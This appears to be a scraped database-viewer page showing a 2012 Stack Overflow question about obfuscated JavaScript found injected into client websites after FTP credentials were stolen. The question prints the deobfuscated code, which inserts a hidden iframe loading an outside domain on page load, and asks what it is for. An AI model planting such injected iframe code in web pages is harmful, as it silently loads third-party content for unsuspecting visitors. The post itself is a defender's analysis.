StackOverflow2013

Note that there are some explanatory texts on larger screens.

plurals

POMalicious JavaScript-Code injected - but doing nothing malicious?
primarykey
Id
9664171
data
AcceptedAnswerId
9750297
AnswerCount
4
ClosedDate
CommentCount
1
CommunityOwnedDate
CreationDate
2012-03-12T09:03:49.587
FavoriteCount
0
LastActivityDate
2012-03-17T13:20:15.920
LastEditDate
2012-03-12T09:15:07.297
LastEditorUserId
815724
OwnerUserId
1263645
ParentId
0
PostTypeId
1
Score
1
ViewCount
704
LastEditorDisplayName
text
Body
<p>I recently discoverd some evil code in some of my clients websites. These snippets where PHP-based and JS-based and were injected because a trojan-virus logged some ftp-credentials. However, the code was obfuscated and as I eval'd it (safely), it looks like this:</p> <pre><code>if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write("<iframe src='http://www.bahnmotive.de/index.htm' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src','http://www.bahnmotive.de/index.htm'); f.style.visibility='hidden'; f.style.position='absolute'; f.style.left='0'; f.style.top='0'; f.setAttribute('width','10'); f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); } </code></pre> <p>As you can see, the URL bahnmotive.de is included in the page as in invisible iframe. This website does not contain any harmful data (at least not today anymore), so I ask myself (and you): Why should someone link to a site in an invisible iframe and not doing some other evil things? My first guess is, that there is a SEO-Agency which promised a lot of traffic on their clients website bahnmotive.de and accomplished that because of this trojan-virus. Could that be? I did a research in Google, but found nothing about this, so I wanted to ask some of the pro's here. Perhaps you can point me to another forum where this topic can be discussed.</p>
Tags
<javascript><security><iframe>
Title
Malicious JavaScript-Code injected - but doing nothing malicious?
singulars
PostAcceptedAnswerId
1. PO
  singulars
  PostTypePostTypeId
  PTAnswer
PostParentId
1. This table or related slice is empty.
PostTypePostTypeId
1. PTQuestion
UserLastEditorUserId
1. USPeter O.
UserOwnerUserId
1. USRobert
plurals
PostLinksPostIdRelatedPostId
1. This table or related slice is empty.
PostLinksRelatedPostIdPostId
1. This table or related slice is empty.
PostsAcceptedAnswerId
1. This table or related slice is empty.
PostsParentIdCreationDate
1. PO
  singulars
  PostTypePostTypeId
  PTAnswer
2. PO
  singulars
  PostTypePostTypeId
  PTAnswer
3. PO
  singulars
  PostTypePostTypeId
  PTAnswer
VotesPostIdCreationDate
1. VO
  singulars
  PostPostId
  POMalicious JavaScript-Code injected - but doing nothing malicious?
  UserUserId
  This table or related slice is empty.
  VoteTypeVoteTypeId
  VTUpMod
CommentsPostId
1. COSeems like you're not the only one: https://www.google.com/search?hl=en&q=%22http%3A%2F%2Fwww.bahnmotive.de%2Findex.htm%22
  singulars
  PostPostId
  POMalicious JavaScript-Code injected - but doing nothing malicious?
  UserUserId
  USMartin Tournoij

Querying!

Guidance

A row detail

Detail views are divided into sections. All the information in the data section comes from columns in the selected row. The other sections display data from other, related rows.

Related data can be related in a to-one or a to-many fashion. Captions of data related in a to-many fashion link to a list view showing a filtered view of the table.

Try moving around until you find a non-empty to-many entry and click on the label to get to one. You can move back to the root by clicking on the database name in the header.